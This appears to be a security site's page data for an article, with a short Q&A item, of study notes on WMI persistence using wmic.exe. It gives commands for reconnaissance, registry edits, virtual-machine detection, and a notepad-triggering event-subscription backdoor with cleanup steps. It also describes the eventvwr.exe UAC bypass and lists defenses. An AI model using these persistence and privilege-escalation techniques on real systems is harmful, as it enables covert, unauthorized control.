[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fQm_1UOVF2KyeCp9hxuSY-6-B4rHS-or-mq-mINTtHz8":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},153,"How can you create a WMI persistence backdoor using wmic.exe?","You create a WMI persistence backdoor by first creating an `__EventFilter` instance that defines the triggering event (e.g., system performance changes), then a `CommandLineEventConsumer` instance specifying the executable to run, and finally a `__FilterToConsumerBinding` instance to link them. All these are done via wmic commands in the `root\\subscription` namespace, as detailed in the persistence section of [Study Notes of WMI Persistence using wmic.exe](\u002Fnews\u002Fstudy-notes-of-wmi-persistence-using-wmic-exe). For example: `wmic \u002FNAMESPACE:\"\\\\root\\\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", ...`.","\u003Cp>You create a WMI persistence backdoor by first creating an `__EventFilter` instance that defines the triggering event (e.g., system performance changes), then a `CommandLineEventConsumer` instance specifying the executable to run, and finally a `__FilterToConsumerBinding` instance to link them. All these are done via wmic commands in the `root\\subscription` namespace, as detailed in the persistence section of [Study Notes of WMI Persistence using wmic.exe](\u002Fnews\u002Fstudy-notes-of-wmi-persistence-using-wmic-exe). For example: `wmic \u002FNAMESPACE:&quot;\\\\root\\\\subscription&quot; PATH __EventFilter CREATE Name=&quot;BotFilter82&quot;, ...`.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fstudy-notes-of-wmi-persistence-using-wmic-exe\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-you-create-a-wmi-persistence-backdoor-using-wmicexe-1777484968495","WMI persistence, __EventFilter, CommandLineEventConsumer, __FilterToConsumerBinding, wmic.exe",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},41,"Study Notes of WMI Persistence using wmic.exe","study-notes-of-wmi-persistence-using-wmic-exe","Explore WMI persistence methods using wmic.exe for system attacks and defense. Learn registry operations, information gathering, and security techniques in Windows environments.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I studied the method shared by Matt Graeber@mattifestation titled 'WMI Persistence using wmic.exe', which gave me new insights into WMI attack techniques. This article will combine previous research findings to share some techniques for leveraging wmic.\u003C\u002Fp>\u003Cp>\u003Cstrong>References:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.exploit-monday.com\u002F2016\u002F08\u002Fwmi-persistence-using-wmic.html\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In previous articles 'WMI Attacks', 'WMI Backdoor', and 'WMI Defense', I shared attack techniques implemented through Poweshell and mof invoking WMI.\u003C\u002Fp>\u003Cp>Similarly, using wmic.exe can achieve the same effect, and it is more direct—simply run commands directly in cmd.\u003C\u002Fp>\u003Ch2>0x02 Information Gathering\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Obtain operating system-related information\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Poweshell code is as follows:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_OperatingSystem\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019799937_0_0dfcc5a25f.png\">\u003C\u002Fp>\u003Cp>The command to switch to wmic.exe is:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_OperatingSystem\u003C\u002Fp>\u003Cp>The echo is as shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019815207_1_3782fbe621.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The format of the echoed content is not aligned; parameters need to be added to specify the output format\u003C\u002Fp>\u003Cp>To display line by line as in the PowerShell echo, the following parameters need to be added:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_OperatingSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Cp>As shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019827721_2_3f4c9ce008.png\">\u003C\u002Fp>\u003Cp>Following this format, other methods of querying WMI via PowerShell can also be implemented using wmic, for example:\u003C\u002Fp>\u003Cp>PowerShell code:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_ComputerSystem\u003C\u002Fp>\u003Cp>Corresponding\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Cp>Method to output results to a file:\u003C\u002Fp>\u003Cp>wmic \u002FOUTPUT:c:\\test\\1.txt \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Ch2>0x03 Registry Operations\u003C\u002Fh2>\u003Cp>PowerShell code as follows:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\DEFAULT -Class StdRegProv\u003C\u002Fp>\u003Cp>Push-Location HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\u003C\u002Fp>\u003Cp>Get-ItemProperty Sys\u003C\u002Fp>\u003Cp>Complete wmic code as follows:\u003C\u002Fp>\u003Cp>Enumerate subkeys:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call EnumKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\"\u003C\u002Fp>\u003Cp>Registry content as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019839866_3_fe2d05f124.png\">\u003C\u002Fp>\u003Cp>Command return results as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019860900_4_6fa0a399cb.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Method execution successful does not necessarily mean obtaining correct return results; attention must be paid to the correct parameter input here. As shown in Figure 2-6, intentionally omitting \" still prompts Method execution successful, but the return result is incorrect\u003C\u002Fp>\u003Cp>Enumerate specified key values:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call EnumValues  ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\Sys\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019866520_5_90f576aaaf.jpeg\">\u003C\u002Fp>\u003Cp>Get the string data value of the specified value:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call GetStringValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\Sys\",\"TasksDir\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019870096_6_51a9c4f4ee.jpeg\">\u003C\u002Fp>\u003Cp>Create subkey:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call CreateKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019874439_7_c504f233a6.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Note the permission issue; administrator privileges are required here.\u003C\u002Fp>\u003Cp>Set a string value for a named value:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call SetStringValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\",\"Data\",\"Name\"\u003C\u002Fp>\u003Cp>The result is as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019878050_8_9d04493685.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If a named value does not exist, it will be created; if it exists, it will be modified.\u003C\u002Fp>\u003Cp>Delete subkey:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call DeleteKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\"\u003C\u002Fp>\u003Cp>Delete a named value setting:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call DeleteValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\",\"Name\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above parameter descriptions are referenced from https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Faa393664(VS.85).aspx\u003C\u002Fp>\u003Cp>The meaning of the special character ^&amp;H80000002 is as follows:\u003C\u002Fp>\u003Cp>&amp;H80000000 'HKEY_CLASSES_ROOT'\u003C\u002Fp>\u003Cp>&amp;H80000001 'HKEY_CURRENT_USER\u003C\u002Fp>\u003Cp>&amp;H80000002 'HKEY_LOCAL_MACHINE\u003C\u002Fp>\u003Cp>&amp;H80000003 'HKEY_USERS\u003C\u002Fp>\u003Cp>&amp;H80000005 'HKEY_CURRENT_CONFIG\u003C\u002Fp>\u003Ch2>0x04 Virtual Machine Detection\u003C\u002Fh2>\u003Ch3>1. Check TotalPhysicalMemory and NumberOfLogicalProcessors\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET NumberOfLogicalProcessors,TotalPhysicalMemory \u002FFORMAT:list\u003C\u002Fp>\u003Cp>The returned result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019881652_9_a927c50e8a.jpeg\">\u003C\u002Fp>\u003Ch3>2. Check current processes\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_Process GET Caption \u002FFORMAT:list\u003C\u002Fp>\u003Ch2>0x05 WMI Persistence\u003C\u002Fh2>\u003Cp>The complete PowerShell implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$filterName = 'BotFilter82'\u003Cbr>$consumerName = 'BotConsumer23'\u003Cbr>$exePath = 'C:\\Windows\\System32\\notepad.exe'\u003Cbr>$Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003Cbr>$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace \"root\\subscription\" -Arguments @{Name=$filterName;EventNameSpace=\"root\\cimv2\";QueryLanguage=\"WQL\";Query=$Query} -ErrorAction Stop\u003Cbr>$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}\u003Cbr>Set-WmiInstance -Class __FilterToConsumerBinding -Namespace \"root\\subscription\" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Next, the corresponding WMIC invocation process is introduced step by step\u003C\u002Fp>\u003Ch3>1. Create an __EventFilter instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", EventNameSpace=\"root\\cimv2\",QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003C\u002Fp>\u003Ch3>2. Create an __EventConsumer instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer CREATE Name=\"BotConsumer23\", ExecutablePath=\"C:\\Windows\\System32\\notepad.exe\",CommandLineTemplate=\"C:\\Windows\\System32\\notepad.exe\"\u003C\u002Fp>\u003Ch3>3. Create a __FilterToConsumerBinding instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding CREATE Filter=\"__EventFilter.Name=\\\"BotFilter82\\\"\", Consumer=\"CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"\"\u003C\u002Fp>\u003Ch3>4. List the __EventFilter and __EventConsumer instances\u003C\u002Fh3>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>Code viewed via PowerShell:\u003C\u002Fp>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventFilter\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventConsumer\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding\u003C\u002Fp>\u003Ch3>5. Remove all instances\u003C\u002Fh3>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"BotFilter82\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"BotConsumer23\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE Filter=\"__EventFilter.Name='BotFilter82'\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In wmic Binding's Filter parameter \"BotFilter82\", the \" must be changed to '\u003C\u002Fp>\u003Cp>Implementation code for cleanup via PowerShell:\u003C\u002Fp>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventFilter -Filter \"Name='BotFilter82'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class CommandLineEventConsumer -Filter \"Name='BotConsumer23'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding -Filter \"__Path LIKE '%BotFilter82%'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Ch2>0x05 fileless UAC bypass using eventvwr.exe and registry hijacking\u003C\u002Fh2>\u003Cp>Some wmic operations require administrator privileges, here's a recently learned UAC bypass technique\u003C\u002Fp>\u003Cp>\u003Cstrong>fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>Learning link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fenigma0x3.net\u002F2016\u002F08\u002F15\u002Ffileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Author:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Matt Nelson @enigma0x3\u003C\u002Fp>\u003Ch3>Principle\u003C\u002Fh3>\u003Cp>When the process eventvwr.exe starts, it first looks for the registry location HKCU\\Software\\Classes\\mscfile\\shell\\open\\command. If this location is empty, it then looks for the registry location HKCR\\mscfile\\shell\\open\\command (whose default value is %SystemRoot%\\system32\\mmc.exe \"%1\" %*), launches mmc.exe with high privileges, and finally opens eventvwr.msc.\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019885508_10_13ecb422b5.jpeg\">\u003C\u002Fp>\u003Cp>Next, if a payload is added to the registry HKCU\\Software\\Classes\\mscfile\\shell\\open\\command, the preset payload can be executed before launching mmc.exe.\u003C\u002Fp>\u003Cp>\u003Cstrong>The most important point:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Modifying the key value of the registry HKCU\\Software\\Classes\\mscfile\\shell\\open\\command only requires standard user permissions.\u003C\u002Fp>\u003Ch3>Implementation\u003C\u002Fh3>\u003Cp>The author shared a PoC code implemented via PowerShell, with the link below:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fenigma0x3\u002FMisc-PowerShell-Stuff\u002Fblob\u002Fmaster\u002FInvoke-EventVwrBypass.ps1\u003C\u002Fp>\u003Cp>If the PoC executes successfully, it will write \"Is Elevated: True\" under C:\\UACBypassTest.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>By default, operations on files in the c:\\ directory will be blocked by UAC.\u003C\u002Fp>\u003Cp>I forked the author's code and made slight modifications, running the following command:\u003C\u002Fp>\u003Cp>C:\\Windows\\System32\\cmd.exe \u002Fc copy c:\\test\\1.txt c:\\1.txt\u003C\u002Fp>\u003Cp>Address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch3>Advantages\u003C\u002Fh3>\u003Cp>This method differs significantly from conventional approaches, with the following advantages:\u003C\u002Fp>\u003Cul>\u003Cli>Fileless\u003C\u002Fli>\u003Cli>No process injection required\u003C\u002Fli>\u003Cli>No need to copy privileged files\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Applicable Environments\u003C\u002Fh3>\u003Cp>Windows 7\u003C\u002Fp>\u003Cp>Windows 8.1\u003C\u002Fp>\u003Cp>Windows 10\u003C\u002Fp>\u003Ch3>Defense\u003C\u002Fh3>\u003Cul>\u003Cli>set the UAC level to \"Always Notify\"\u003C\u002Fli>\u003Cli>remove the current user from the Local Administrators group\u003C\u002Fli>\u003Cli>alert on new registry entries in HKCU\\Software\\Classes\\\u003C\u002Fli>\u003C\u002Ful>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Recently, I studied the method shared by Matt Graeber@mattifestation titled 'WMI Persistence using wmic.exe', which gave me new insights into WMI attack techniques. This article will combine previous research findings to share some techniques for leveraging wmic.\u003C\u002Fp>\u003Cp>\u003Cstrong>References:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.exploit-monday.com\u002F2016\u002F08\u002Fwmi-persistence-using-wmic.html\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In previous articles 'WMI Attacks', 'WMI Backdoor', and 'WMI Defense', I shared attack techniques implemented through Poweshell and mof invoking WMI.\u003C\u002Fp>\u003Cp>Similarly, using wmic.exe can achieve the same effect, and it is more direct—simply run commands directly in cmd.\u003C\u002Fp>\u003Ch2>0x02 Information Gathering\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Obtain operating system-related information\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Poweshell code is as follows:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_OperatingSystem\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019799937_0_0dfcc5a25f-1.png\">\u003C\u002Fp>\u003Cp>The command to switch to wmic.exe is:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_OperatingSystem\u003C\u002Fp>\u003Cp>The echo is as shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019815207_1_3782fbe621-1.png\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The format of the echoed content is not aligned; parameters need to be added to specify the output format\u003C\u002Fp>\u003Cp>To display line by line as in the PowerShell echo, the following parameters need to be added:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_OperatingSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Cp>As shown\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019827721_2_3f4c9ce008-1.png\">\u003C\u002Fp>\u003Cp>Following this format, other methods of querying WMI via PowerShell can also be implemented using wmic, for example:\u003C\u002Fp>\u003Cp>PowerShell code:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\CIMV2 -Class Win32_ComputerSystem\u003C\u002Fp>\u003Cp>Corresponding\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Cp>Method to output results to a file:\u003C\u002Fp>\u003Cp>wmic \u002FOUTPUT:c:\\test\\1.txt \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET \u002Fall \u002FFORMAT:list\u003C\u002Fp>\u003Ch2>0x03 Registry Operations\u003C\u002Fh2>\u003Cp>PowerShell code as follows:\u003C\u002Fp>\u003Cp>Get-WmiObject -Namespace ROOT\\DEFAULT -Class StdRegProv\u003C\u002Fp>\u003Cp>Push-Location HKLM:SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\u003C\u002Fp>\u003Cp>Get-ItemProperty Sys\u003C\u002Fp>\u003Cp>Complete wmic code as follows:\u003C\u002Fp>\u003Cp>Enumerate subkeys:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call EnumKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\"\u003C\u002Fp>\u003Cp>Registry content as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019839866_3_fe2d05f124-1.png\">\u003C\u002Fp>\u003Cp>Command return results as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019860900_4_6fa0a399cb-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Method execution successful does not necessarily mean obtaining correct return results; attention must be paid to the correct parameter input here. As shown in Figure 2-6, intentionally omitting \" still prompts Method execution successful, but the return result is incorrect\u003C\u002Fp>\u003Cp>Enumerate specified key values:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call EnumValues  ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\Sys\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019866520_5_90f576aaaf-1.jpeg\">\u003C\u002Fp>\u003Cp>Get the string data value of the specified value:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call GetStringValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\Sys\",\"TasksDir\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019870096_6_51a9c4f4ee-1.jpeg\">\u003C\u002Fp>\u003Cp>Create subkey:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call CreateKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\"\u003C\u002Fp>\u003Cp>The return result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019874439_7_c504f233a6-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Note the permission issue; administrator privileges are required here.\u003C\u002Fp>\u003Cp>Set a string value for a named value:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call SetStringValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\",\"Data\",\"Name\"\u003C\u002Fp>\u003Cp>The result is as shown in the figure.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019878050_8_9d04493685-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If a named value does not exist, it will be created; if it exists, it will be modified.\u003C\u002Fp>\u003Cp>Delete subkey:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call DeleteKey ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\"\u003C\u002Fp>\u003Cp>Delete a named value setting:\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\DEFAULT\" path stdregprov call DeleteValue ^&amp;H80000002,\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RenameFiles\\test\",\"Name\"\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The above parameter descriptions are referenced from https:\u002F\u002Fmsdn.microsoft.com\u002Fen-us\u002Flibrary\u002Faa393664(VS.85).aspx\u003C\u002Fp>\u003Cp>The meaning of the special character ^&amp;H80000002 is as follows:\u003C\u002Fp>\u003Cp>&amp;H80000000 'HKEY_CLASSES_ROOT'\u003C\u002Fp>\u003Cp>&amp;H80000001 'HKEY_CURRENT_USER\u003C\u002Fp>\u003Cp>&amp;H80000002 'HKEY_LOCAL_MACHINE\u003C\u002Fp>\u003Cp>&amp;H80000003 'HKEY_USERS\u003C\u002Fp>\u003Cp>&amp;H80000005 'HKEY_CURRENT_CONFIG\u003C\u002Fp>\u003Ch2>0x04 Virtual Machine 